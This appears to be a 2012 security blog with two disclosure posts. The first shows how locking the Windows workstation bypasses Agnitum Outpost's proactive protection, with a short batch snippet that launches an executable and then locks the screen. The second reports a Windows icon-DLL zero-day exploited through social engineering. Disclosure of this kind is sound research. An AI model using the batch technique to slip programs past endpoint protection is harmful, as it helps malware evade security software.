воскресенье, 23 декабря 2012 г.

Bypass proactive protection in Agnitum Outpost Security Suite. Full video demonstration.

 I have previously reported without technical details

Here is a video demonstration with technical details.

 Vulnerable: Agnitum Outpost Security Suite v 7.5.3 (3942.608.1810); other versions may also be affected.
Fixed in version 8.0 (4164.652.1856)

This video demonstration was first shown on zeroday show (ZeroNights conference 2012).

We can use Windows Lock to bypass proactive protection.

If you want to automate use bat-file below

start 1.exe
ping -n 10 -w 10000 > NULL & rundll32.exe user32.dll,LockWorkStation

Original post in Russian

четверг, 20 декабря 2012 г.

Russian researcher found 0day vulnerability on Windows XP\Vista\7

Russian researcher found 0day vulnerability on Windows XP\Vista\7 (doesn't work on Windows 8). This vulnerability has much in common with
CVE-2010-2568 aka (StuxNet used it). At this time we do not know if is it possible to use this vulnerability as an autorun like Stuxnet use lnk-files on usb stick (some people believe it's possible).

The researcher announced only about social engineering way. Attacker must give evil DLL-file to victim and victim must point this DLL-file as source of icons for some folder (see image below):

Video demonstration